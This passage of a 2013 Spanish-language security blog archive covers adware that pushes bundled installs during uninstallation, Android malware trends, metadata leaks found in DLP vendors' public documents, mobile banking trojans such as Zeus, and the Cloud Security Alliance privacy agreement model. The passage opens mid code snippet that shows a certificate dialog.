bool fPropertiesChanged = false;
if (!CryptUIDlgViewCertificate(ref certViewInfo, ref fPropertiesChanged))
{
int error = Marshal.GetLastWin32Error();
MessageBox.Show(error.ToString());
}
Finalmente se consigue que se muestre el resultado deseado, validando gráficamente la cadena. Tero de la Rosa tero@11paths.com
18 de septiembre de 2013
Curiosa secuencia de (des)instalación de un adware
Bubble dock es un conocido programa que se mueve en esa línea gris por la que se pasea mucho software: promete alguna funcionalidad interesante y al final la ofrece (o no), pero a cambio utiliza todo tipo de técnicas para o bien obtener información del sistema y venderla a publicistas, o bien bombardea con más anuncios y otros programas. Puede llegar a ser muy molesto. Y lo que más odia, es que lo eliminen. Bubble dock ofrece una barra parecida al Dock de Mac OSX para Windows. Pero en realidad es un adware en toda regla. Cinco minutos usando el sistema con Bubble Dock instalado bastan para ser hostigado con todo tipo de publicidad, sufrir un secuestro del buscador de los navegadores, ser invitado a concursos falsos, y machacar al usuario con páginas que piden datos personales. No demasiados motores detectan el instalador como adware, lo que hace pensar que quien sea que produzca el programa, se trata de una de esas empresas de dudosa reputación que ha conseguido instaurarse en la legalidad. Lo normal en este tipo de software es que se encuentren asociados con otros programas de similares y que, durante la instalación, se busque pescar al usuario incauto. Esta secuencia de pantallas que piden permiso para instalar otro software son las típicas trampas para el usuario impaciente. Intentando instalar software adicional. Atención a la traducción "Salva dinero..." Mientras se utiliza, el programa entorpece cualquier acción en Windows. Buscadores modificados similares a Google, molestos pop-ups y un agente que sugiere publicidad y programas desde el systray Pero si, harto de tanta publicidad, se decide desinstalar el programa... (y esto es lo curioso) también intenta cazar al usuario más impetuoso. Invita a instalar hasta cuatro programas diferentes mientras se está desinstalando Bubble Dock... Cualquier despiste o dedo rápido hacia el "siguiente" culmina en justo lo contrario de lo que se desea. La secuencia es esta (aunque pregunta a un servidor online qué programas ofrecer y varían en cada caso): Las traducciones son bastante malas Para finalizar, pregunta por qué se ha desinstalado el programa.. Esta modalidad (en la que el proceso de eliminación enmascara otras instalaciones) va un paso más allá en el "adware de acompañamiento" que financia muchas empresas que ofrecen los programas de forma gratuita. Suponemos que no es nuevo, y aunque el hecho de usar esta técnica caza-impacientes también durante el proceso de desinstalación sigue siendo legítima estrictamente hablando, resulta todavía más cuestionable desde el punto de vista ético. Afortunadamente se soluciona de una manera relativamente sencilla. Aprendiendo a leer y desmarcando todas las casillas activas por defecto. Sergio de los Santos ssantos@11paths.com @ssantosv
16 de septiembre de 2013
Android y la industria del malware
Está de moda afirmar que Android es el nuevo Windows. De alguna manera es bastante cierto, pero existen diferencias fundamentales que merece la pena señalar. Porque el hecho de que exista mucho malware para ambos, no los convierte en sistemas semejantes... Los motivos por los que se infecta y las técnicas, son diferentes. Déjà vu en Android Los trucos y técnicas de ingeniería social históricamente usados en Windows para infectar a usuarios, se están trasladando a Android. Uno de los últimos métodos conocidos, implica malware distribuido por correo electrónico con un APK adjunto que simular ser una notificación fallida de un paquete por USPS. Esto ha ocurrido desde siempre en Windows. El scareware en Android también está comenzando a surgir de forma generalizada, con rogueware que simula librar al teléfono de fallos inexistentes. También el ransomware es una familia que se está introduciendo en Android (gracias al éxito del virus de la policía)... Scareware en Android que no es más que una animación en una web Y como guinda, el malware bancario también apunta a Android como objetivo, no ya como "complemento" del malware para Windows sino como fin en sí mismo. Aplicaciones falsas en Google Play (que falla en sus controles) recuerdan a la publicidad engañosa y los programas falsos que las víctimas piensan que necesitan para visualizar contenido en Windows... incluso ya existe en Android malware totalmente dirigido, como el caso de marzo contra activistas. Todas estas son técnicas de infección y estafas que ya hemos sufrido en Windows, y en estos ejemplos se está usando Android como vehículo para infectar a través de las mismas variaciones de métodos basados en la "ingeniería social" y con el mismo fin de lucro o robo. Hasta aquí, las coincidencias son absolutas... y lógicas. Los descritos son adaptaciones digitales de estafas que difícilmente cambiarán porque están basadas en la "vulnerabilidad humana": el miedo a perder datos, credulidad, curiosidad... que casan perfectamente con la necesidad de lucro por parte de los atacantes, (algo que tampoco cambiará porque han comprobado que existe un mercado floreciente). En este aspecto cualquier objetivo, incluyendo Android, es "el nuevo Windows", porque el problema no es tanto de la técnica del ataque o el dispositivo donde se perpetre, sino la credulidad y el desconocimiento del usuario ante el dispositivo. El atacante confía en sus poderes de convicción para que sea la propia víctima la que se infecte. Vulnerabilidades vs. infecciones Pero hay aspectos en los que no se parecen tanto, como las vías de infección. Por ahora, el atacante de Android confía mucho en que el usuario ejecute el APK y lo instale. Por eso despliega todo tipo de trucos para convencerlo. Aunque se han dado casos de malware para Android que explota vulnerabilidades del propio sistema operativo. Por ejemplo el famoso fallo criptográfico en Android, propició la aparición de malware que aprovechaba el problema. También durante 2012 se dieron casos de vulnerabilidades en el navegador de Android para infectar teléfonos con solo visitar webs. Aunque no es lo habitual. Aquí encontramos la mayor diferencia. El malware para Windows sí que suele aprovechar vulnerabilidades para instalarse de forma que no requiera de la colaboración del usuario. Esto es lo que ofrece a Windows esa imagen de inseguridad y asociación perenne con el malware. Los problemas pueden llegar por otras muchas vías además de la ingeniería social: sistema operativo, navegador, reproductor, plugins, documentos, PDFs... sin que el usuario lo note y acabar pensando que el sistema operativo Windows es incontrolable porque "él no ha hecho nada". Hasta el usuario con el sentido común más agudizado, debe tener cuidado cuando usa Windows "gracias" en buena parte a los los sospechosos habituales: Flash, Office, plugin de Java, Adobe Reader... Todo este software "común" ayuda a que la imagen de Windows como foco del malware se perpetúe, a pesar de las medidas de seguridad que integra internamente para evitarlo. Android todavía no se encuentra en ese punto del camino en su cruzada contra el malware. No se suele vulnerar en general ni el sistema operativo (más allá de la incomprensible política de firma de programas) ni aplicaciones "comunes" con las que se pudiera contaminar a muchos usuarios. ¿Qué ocurrirá si mejora la seguridad de Android y los atacantes se ven obligados a explotar en mayor medida vulnerabilidades como ocurre ahora en Windows? Teniendo en cuenta algo tan básico como la actualización de seguridad del sistema operativo y los problemas de coordinación con las operadoras, no se ofrecen muchas esperanzas.... Fuente: http://www.juniper.net/us/en/local/pdf/additional-resources/3rd-jnpr-mobile-threats-report-exec-summary.pdf Android parte con desventaja El problema de salir al escenario con gran cuota de mercado y ser objetivo del malware lo ha sufrido históricamente Microsoft, ha lidiado con él y en los últimos años incluso se ha "mejorado" considerablemente la situación en un juego en el que ambos bandos han elevado el listón. Si iOS se curó en salud, y resulta robusto y resistente contra el malware por diseño, Android cometió errores (por ejemplo con la mencionada política de certificados de aplicaciones, aunque puede que no sea un "error" sino una estrategia para atraer programadores) y sufre las consecuencias. La marca ya está indiscutiblemente asociada al malware, y a eso se refiere la frase "Android es el nuevo Windows". Pero además parte con desventaja, porque parecen ir a dos velocidades diferentes. El malware no viene de la banda de adolescentes que atacaba a Windows a finales de los 90, sino que se trata de una mafia organizada. El tráfico de vulnerabilidades es un mercado en auge que mueve mucho dinero, se habla de APTs, ciber* y espionaje gubernamental... y Android parece no estar (y quizás tampoco lo estén muchos de los desarrolladores) interesado en priorizar la seguridad. También parte con desventaja si busca ayuda en el software antimalware. Por mucho que las casas antivirus estén deseando ampliar su mercado, se enfrentan a los mismos problemas que el PC de escritorio con la dificultad añadida de que técnicamente las soluciones no están tan maduras, ni los usuarios tan concienciados. En este sentido todavía deben luchar contra bulos y mitos. Fuente: http://www.juniper.net/us/en/local/pdf/additional-resources/3rd-jnpr-mobile-threats-report-exec-summary.pdf Android ha resultado el SO más sencillo de atacar para la industria, mientras el malware crece de forma desorbitada en calidad y cantidad. Se ha topado contra la arrolladora maquinaria del malware actual como primer enemigo, sin la oportunidad de "entrenar" en "ligas menores" ni querer aprender de experiencias ajenas. Un claro ejemplo del desfase en la contienda se ha observado recientemente con malware ya muy sofisticado para Android que "prestaba" sus servicios de difusión por SMS a una familia diferente para infectar más teléfonos. Ellos están organizados y funcionan. ¿Mejora al mismo ritmo Android? Las medidas de seguridad más interesantes se están introduciendo en las últimas versiones, pero el despliegue es lento y las mejoras tibias. Como esperanza, la historia demuestra que nunca hay que descartar el poder de Google cuando decide poner patas arriba un sector o un modelo que se creía inmutable. Quizás en algún momento se harte de que se asocie el malware a la marca.... Sergio de los Santos ssantos@11paths.com @ssantosv
13 de septiembre de 2013
Fuga de información en empresas líderes en Data Loss Prevention
Gartner ha publicado un estudio en el que clasifica a las empresas más importantes que ofrecen soluciones de prevención de fuga de información (Data Loss Prevention o DLP) según su posición, estrategia, eficacia y liderazgo en el mercado. Hemos realizado un pequeño experimento para comprobar si estas mismas compañías controlan la publicación de metadatos en sus propios servidores, como potencial punto de fuga de información sensible. Según el estudio Magic Quadrant for Content-Aware Data Loss Prevention realizado por la consultora Gartner, en el año 2014 más del 50% de las empresas utilizará alguna característica en sus políticas de seguridad a la hora de realizar una prevención de fuga de información (Data Loss Prevention) en sus datos sensibles. Sin embargo sólo el 30% de estas dispondrá de una solución o estrategia DLP global basada en el contenido. El estudio realizado por Gartner determina cuáles son las empresas líderes a la hora de realizar prevención de fuga de información, estableciendo como factores de medición para generar el liderazgo indicadores como las soluciones empresariales Content-Aware DLP proporcionadas, los productos DLP-Lite ofertados o si proporcionan un canal DLP para aclarar al usuario dudas respecto a determinados cumplimientos regulatorios, por ejemplo. Gráfico de las empresas líderes en Data Loss Prevention, según Gartner ¿Evitan estas empresas la fuga de información a través de metadatos en sus propios sistemas? Con MetaShield Forensics, se ha realizado un análisis al frontal web principal de estas compañías que aparecen en el estudio. MetaShield se ha encargado de descargar y analizar los documentos públicos expuestos en la web. Los resultados se muestran de manera genética en la siguiente tabla. Todas las empresas estudiadas cuentan con metadatos asociados a los documentos públicos que exponen en internet. Parece que estos documentos no están siendo sometidos a ningún proceso de limpieza y, por tanto, son susceptibles de convertirse en un punto de fuga de información confidencial que es necesario tener en cuenta. La siguiente tabla muestra en datos brutos, la pérdida de información expuesta por cada una de las empresas de seguridad. Total de fuga de información expuesta por las empresas que proporcionan herramientas y servicios DLP En función de la tabla anterior, se ha procedido a realizar un nuevo gráfico mostrando la cantidad de fuga de información producida por las empresas DLP estudiadas. Lógicamente, las entidades analizadas que sufren más fuga de información a través de los metadatos son las que también exponen un mayor número de documentos públicos en sus sitios web. Fuga de información expuesta por las empresas que proporcionan herramientas y servicios DLP La información que se filtra en mayor número de ocasiones a través de los metadatos son en general los nombres o cuentas de usuario, seguido de los directorios internos desde donde se generaron los documentos. También es muy habitual encontrar las versiones de software concreto usadas para su generación. En conjunto, información valiosa para un potencial atacante. Veamos algunos detalles sobre la información expuesta: Usuarios y cuentas de correo de usuario: Los usuarios internos y sus cuentas de correo constituyen una de las fugas de información más llamativas. Exponer información de este tipo puede facilitar al atacante la elaboración de ataques más sofisticados. Direcciones a servicios web internos: Tanto web como locales, algunos de los directorios expuestos proporcionan información valiosa sobre los sistemas de gestión internos utilizados por las entidades. Como ejemplo, se ha encontrado entre los metadatos de uno de los documentos, la URL que apunta a la solución OpenNMS (http://159.36.2.25:8980/opennms/event/…/) de la compañía Symantec. Se trata de una solución utilizada por administradores de red para controlar servicios críticos en máquinas remotas. Directorios internos de usuarios: Los directorios más comunes localizados son aquellos que se generan asociados al perfil de usuario de los equipos de trabajo, donde se puede identificar al propio usuario a través de las típicas rutas establecidas en determinados sistemas (como la que se establece a las carpetas personales tipo Escritorio, Mis documentos, etc.). Como ejemplo C:Documents and Settingsholly_waggonerM 20Documents****** Webpress2004 es detectada en una de las empresas DLP. Impresoras de red asociadas a servidores de impresión: Es otra de las fugas de información más comunes detectadas. Impresoras de red que exponen información sobre su modelo y tipo, así como sobre a qué servidores se encuentran asociadas (ya sea mostrando su nombre o dirección IP interna). Software utilizado por la organización: Otro dato que puede considerarse fuga de información consiste en los datos acerca de los elementos de software utilizados por las organizaciones. La fuga de información más común encontrada en la categoría de software es aquella que hace referencia al tipo de software utilizado a la hora de generar los archivos PDF, al tratarse de uno de los formatos más utilizado para publicar en entornos web. Otros metadatos que proporcionan información sensible: Un apartado curioso al analizar los metadatos de los archivos son esas propiedades personalizadas que muchos ficheros exponen, y que de tanto en tanto, son detectadas proporcionando una fuga de información más relevante de lo que en un principio pudiera sospecharse. Propiedades como el asunto de un determinado correo donde se ha adjuntado un archivo o a quién fue enviado, pueden ofrecer pistas sobre las estrategias internas de negocio de una organización, como puedan ser relaciones entre empresas o profesionales. Conclusiones Quizás los metadatos siguen siendo uno de los grandes olvidados a la hora de controlar el flujo de información expuesto en las páginas corporativas o simplemente en el momento de compartir documentos. La fuga de información puede producirse a diferentes niveles y a través de muchos frentes. Si bien la pérdida, publicación no controlada o exposición no intencionada de documentos supone un claro ejemplo de problema que debe ser evitado, la fuga de metadatos de los documentos (aunque sean públicos) no deben ser menospreciados, especialmente en compañías que ofrecen soluciones para controlar la fuga de información. El proceso de fuga de información no debe observarse como un único incidente aislado que permite a un atacante obtener un documento, correo o información sensible. También es un proceso al que un atacante dedicará un tiempo (determinado por su motivación) para concluir un ataque. Durante este estudio del objetivo (y dependiendo de las soluciones que implemente y lo protegida que se encuentre la entidad) el atacante recopilará toda la información posible sobre la compañía aprovechando todo tipo de fugas (por pequeñas que pudieran parecer) para conseguir conocer en profundidad el objetivo y perpetrar un ataque dirigido. Las empresas que comercializan productos contra la fuga de información, deberían tenerlo en cuenta también en sus propios sistemas. Por ejemplo, es una práctica que ya está contemplada y que es de obligado cumplimiento para administraciones públicas según el Esquema Nacional de Seguridad o la LOPD. Rubén Alonso Cebrián ruben.alonso@11paths.com
15 de agosto de 2013
Banca móvil y troyanos bancarios
Durante 2012 se produjo un incremento del 28% en la banca móvil o M-Banking. Los usuarios acceden a sus cuentas bancarias desde sus dispositivos móviles, principalmente a través de una aplicación creada específicamente para el acceso a la entidad bancaria. ¿Qué beneficios y problemas nos trae este nueva forma de interactuar con las entidades bancarias? Fuente: http://qz.com/79818/why-you-should-access-online-banking-on-your-smartphone-rather-than-your-computer/ ¿En qué nos beneficia M-Mobile? Las aplicaciones específicas de cada entidad (descargadas generalmente desde las tiendas de aplicaciones oficiales, como la App Store de Apple o Google Play de Android por seguridad y disponibilidad) facilitan el acceso a nuestras cuentas de una manera más rápida y directa evitando en cierta manera el riesgo de phishing que podría resultar del uso del navegador y enlaces. Pero el uso de aplicaciones conlleva otros riesgos. Se supone que las apps se someten a una serie de pruebas y análisis antes de estar disponibles para el público. Entre otras medidas, Google Play utiliza "Bouncer", un sistema que analiza dinámicamente las aplicaciones antes de hacerlas públicas, pero que no ha evitado que la tienda oficial aloje una buena cantidad de malware para el dispositivo, camuflado tanto en aplicaciones legítimas como en programas que simulan ser de una entidad bancaria y que solo pretenden robar credenciales. La Apple Store se encuentra mejor protegida en este aspecto, por su política mucho más restrictiva a la hora de permitir subir una aplicación a la tienda. Hasta ahora, se han dado casos de aplicaciones que simulan ser los programas oficiales necesarios para operar con una entidad bancaria. Estas se ofertan habitualmente desde repositorios fraudulentos o desde la tienda oficial (durante un corto espacio de tiempo en cuanto consiguen detectarla). Pero hay otras fórmulas. Aunque no se han dado muchos casos de este tipo, el malware previamente alojado en el dispositivo también podría llegar a robar la información de la aplicación bancaria legítima. El método para infectar el dispositivo en primer lugar suele ser la instalación de una aplicación que contiene el malware o que "es" el malware, aunque también puede venir desde un adjunto de un correo electrónico, o incluso a través de un PC infectado. Luego, bastaría con acceder a los datos tecleados, o que viajan por la red generados por la aplicación oficial. Culpables El malware Zeus (Zbot) con sus múltiples variantes es el troyano bancario más popular. Programado en C++ (y PHP su parte "servidor") fue descubierto inicialmente en 2007 y supuso una verdadera revolución en el mundo del malware, dada su especialización y habilidad para obtener credenciales de la banca online en un Windows. Ha ido evolucionando con el tiempo, adaptándose y mejorando para eludir los nuevos sistemas de seguridad. Zeus se podía conseguir en el mercado negro con un coste aproximado de 2500 – 3000€ proporcionando un completo arsenal de información y manuales para "aprender a robar". Aparte, los estafadores pueden comprar módulos adicionales para mejorar la funcionalidad o incluso usarlo como servicio, alquilando botnets de sistemas infectados. En 2011 se filtró su código fuente, dando lugar a otras variantes mantenidas por "la comunidad". SpyEye es también un malware bancario muy popular, con una buena cantidad de plugins y funcionalidades muy avanzadas. El malware basado en Zeus está en continuo movimiento y mejora, en un intento de hacer caja con la venta del producto. Como ejemplo, una nueva variante de malware bancario "as a service" aparecido en 2013 es “KINS” (Kasper internet non security) desarrollado a partir de Zeus y añadiendo mejoras de SpyEye. Se puede adquirir en el mercado negro y se espera que cubra el hueco dejado por sus antecesores y aproveche un trozo del "mercado". Fuente: https://blogs.rsa.com/is-cybercrime-ready-to-crown-a-new-kins-inth3wild/ Malware y teléfonos A medida que avanzaba la seguridad en la banca online, integrando el móvil como segundo factor de autenticación, el malware (en especial Zeus y sus variantes) tuvo que adaptarse e infectar también estos dispositivos. Así, se instauró el término "MitMo" (Man in the mobile) para un tipo de variante de Zeus que intentaba eludir la seguridad de la banca online infectando también el teléfono y, con ello, los SMS usados como fórmula de autenticación. El usuario (ya infectado en su PC) es instado a descargar una aplicación en el móvil. Este malware para móvil debe funcionar en conjunto con el troyano que se aloja en el sistema de la víctima. Por sí solos, no están destinados específicamente al robo de información bancaria en el móvil. Pero ya se han observado variantes de malware para Android específicamente diseñadas para robar a usuarios de un banco en concreto. Kasperksy ha alertado sobre un malware que, además de robar todo tipo de información del teléfono, es capaz de comunicarse a través de comandos POST con un C&C. Pero lo más interesante es que contiene código específicamente diseñado para obtener el balance del usuario si este está registrado con el banco ruso Sberbank (enviando un SMS a un número gratuito a disposición de sus clientes). También intercepta todos los SMS y llamadas relacionadas con ese banco, lo que supone un primer acercamiento a una funcionalidad básica de los troyanos bancarios para PC, que desde hace tiempo están programados específicamente para cada banco. Fuente: http://www.securitylab.ru/news/442700.php De momento solo ha sido detectado en Rusia, cuna junto a otros países del Este de gran parte del malware bancario más sofisticado. Antonio Bordón Villar antonio.bordon@11paths.com
13 de agosto de 2013
Modelo de "Acuerdo de Nivel de Privacidad" para Cloud Services
Uno de los principales (y más delicados) aspectos que hay que tener en cuenta a la hora de realizar una la contratación de servicios de Cloud Computing es, sin duda alguna, el acuerdo de servicio que se establece entre el cliente y el proveedor de servicios. En este acuerdo, uno de los factores más críticos e importantes a tener en cuenta es la privacidad y, en concreto, el punto referente a la protección de datos que un proveedor de servicios de Cloud Computing se compromete a mantener con respecto al tratamiento de los datos de carácter personal. No se debe confundir este tipo de acuerdos con los Acuerdos de Nivel de Servicio, también conocidos por sus siglas en inglés SLA ( Service Level Agreement). Estos son usados generalmente para proporcionar métricas y otro tipo de información acerca del rendimiento de los servicios. En concreto, el Acuerdo de Nivel de Privacidad está orientado a suministrar a los clientes actuales y potenciales de servicios Cloud Computing, una herramienta para evaluar y calificar el compromiso del proveedor del servicio en el ámbito de la privacidad. De igual manera, facilita a los proveedores una herramienta para promocionar sus buenas prácticas respecto a la privacidad y a la protección de los datos, volviéndose especialmente interesante sobre todo cuando la información que se va a gestionar no se encuentra dentro de las mismas fronteras de la entidad que va a contratar el servicio con el proveedor. Para ello la Cloud Security Alliance (CSA), organización de referencia encargada de promover el uso de buenas prácticas para ofrecer garantías de seguridad en Cloud Computing, además de educar sobre los usos de esta tecnología, ha publicado este año un modelo de Acuerdo de Nivel de Privacidad (Privacy Level Agreement, PLA), disponible tanto en inglés como en español, estableciéndose como un estándar de uso para las organizaciones a la hora de regular la privacidad en los servicios que puedan contratarse en la nube. Dentro de este acuerdo se contemplan los objetivos que deben cumplir este tipo de acuerdos, las consideraciones e investigaciones que deben realizarse antes de contratar el servicio y por último el esquema del acuerdo. El esquema se encarga de contemplar aspectos tan cruciales como: La información del proveedor de servicio (denominación, dirección del lugar de establecimiento, representante local en la UE, función asumida en materia de protección de datos, datos de contacto del delegado de protección de datos que atenderá las solicitudes del cliente y datos de contacto del responsable de seguridad de la información). Las categorías de datos personales que el cliente puede o no transmitir o tratar en la nube. Las formas en que los datos serán tratados. Esto abarca desde las tareas llevadas a cabo por iniciativa del proveedor, las que el cliente solicita adicionalmente y las que éste llevará a cabo por cuenta propia. Además incluye temas como subcontratistas, uso de software adicional en el sistema del cliente o la ubicación de los datos personales. Este último aspecto supone una de las principales polémicas de este tipo de servicio. En función de la ubicación donde se encuentren almacenados los datos, una entidad, al estar sujeta a las leyes y regulaciones del país o región donde se ubica y no a donde resida el cliente, se puede ver afectada por leyes y regulaciones diferentes en temas de privacidad y protección de datos. Un claro ejemplo de ley (quizás intrusiva) es la americana USA Patriot ACT. Temas relacionados a transferencia y migración de datos transfronterizos ante situaciones de normalidad y emergencia. Medidas de seguridad técnicas, físicas y organizativas que se implementarán para la protección de los datos, además de las medidas de seguridad que se implementarán para satisfacer su disponibilidad, integridad y confidencialidad, así como también transparencia, aislamiento, capacidad de intervención, portabilidad y responsabilidad. Temas relacionados a la supervisión y monitorización por parte del cliente al proveedor de servicio para verificar que cumple apropiadamente con las medidas de seguridad descritas. Auditorías de terceros al proveedor del servicio, y al servicio contratado. También la posibilidad de facilitar al cliente informes, estudios y frecuencia con la que se actualizan. Notificación de violaciones de datos de carácter personal o de la privacidad de la información del cliente. Políticas de retención de datos del proveedor del servicio, condiciones para devolver los datos de carácter personal y su destrucción una vez el servicio haya finalizado. Políticas y procedimientos para garantizar el cumplimiento legal del acuerdo por parte del proveedor de servicio, subcontratistas y socios de negocios, así como la cooperación de cada uno de ellos con el cliente para el cumplimiento legal de las disposiciones de protección de datos. Procesos para la gestión y respuesta de peticiones de revelación de datos de carácter personal por parte de autoridades. Compensaciones en caso de que el proveedor de servicio, subcontratistas y socios de negocios incumplieran las obligaciones descritas en el acuerdo. Datos de contacto y procedimiento para preguntas y reclamaciones que el proveedor del servicio o subcontratistas pudieran recibir por parte del cliente. Alcance de las pólizas de ciberseguros del proveedor de servicio de Cloud Computing incluyendo seguros relativos a fallos de seguridad. Este modelo busca contribuir a la generación de confianza y transparencia en la prestación de este tipo de servicios. Pare ello, la Cloud Security Alliance se ha basado en la normativa europea en materia de protección de datos en vigor, además de tener en cuenta las buenas prácticas y recomendaciones de distintas autoridades de protección de datos como el Grupo Europeo de Protección de Datos del Artículo 29 y la Agencia Española de Protección de Datos. De esta manera, el Acuerdo de Nivel de Privacidad puede ser considerado como una herramienta para reducir las barreras u obstáculos existentes entre clientes y proveedores a la hora de la adquisición de este tipo de servicios. Umberto Schiavo umberto.schiavo@11paths.com
30 de julio de 2013
Agujeros de seguridad de sitios Web
Cada vez que descargamos documentos ofimáticos de sitios web podemos comprobar dos cosas. Una, que realmente se descarga el archivo que queremos, y otra es ver determinada información sensible del propio archivo, que con básicos conocimientos podremos sacar a la luz: su fecha de creación, autor, modificaciones del documento, programa con el que se hizo, sistema, etc. Algo así como la etiqueta identificativa de cualquier producto comercial donde podemos encontrar sus ingredientes, fabricante, caducidad, etc. Imagen 1: Metadatos genéricos de un documento Es posible que estos metadatos, sean banales para la mayoría de los usuarios pero son muy interesantes y atractivos para los curiosos, pudiendo llegar a causarnos un grave perjuicio si esa fuera su intención. ¿Es realmente necesario que los documentos lleven esta información implícita? En toda creación de documentos va asociada una determinada información que no está visible directamente a ojos del usuario, ya que como es lógico, se está más pendiente de lo que está creando, que de los metadatos que el equipo pueda ir alojando en el archivo. Estos metadatos se alojan internamente en los archivos de manera automática, y cada vez que el archivo sufre algún cambio, los metadatos se actualizan con la nueva información. Otra cosa a tener en cuenta es que no todas las aplicaciones añaden los mismos metadatos. Un archivo de fotos no lleva los mismos metadatos que un documento word. Poder llegar a ver si nuestros documentos llevan o no metadatos es tarea fácil con herramientas sencillas, en el mercado hay varias que nos permitirán poder acceder a la información sensible de nuestros documentos y comprobar cuanta información estamos regalando al mundo en el momento de enviar estos archivos por la web o correo electrónico. ¿Qué pueden hacer con nuestros metadatos? La fuga de información es mejor prevenirla de antemano. Si sabemos que los archivos no saldrán nunca de nuestro servidor web no tendríamos por qué preocuparnos, pero si estos archivos viajan por la red, los metadatos viajaran con ellos. Enviar archivos propios a otros equipos conllevará a una probable fuga de información, si no se remedia antes. Un usuario malintencionado podría utilizar esta información con fines perjudiciales y esto es mejor prevenirlo. ¿Cómo podemos evitar esta fuga de información en nuestros sitios web? Lo ideal sería poder ofrecer cualquier documento ofimático de los repositorios, limpios de metadatos, manteniendo así la confidencialidad de la información que llevan incrustada. Para solucionarlo existen herramientas en el mercado que ya pueden eliminar esta información de manera definitiva y segura. Pero atención, si protegemos los documentos mediante contraseña no podremos limpiarlos de metadatos, esto hay que tenerlo en cuenta, será necesario desproteger el documento antes de limpiarlo y poderlo enviar. Evitar situaciones comprometidas es factible con la tecnología que nos rodea, simplemente debemos prestarle un poco de atención a estos pequeños grandes detalles que también son importantes.
28 de junio de 2013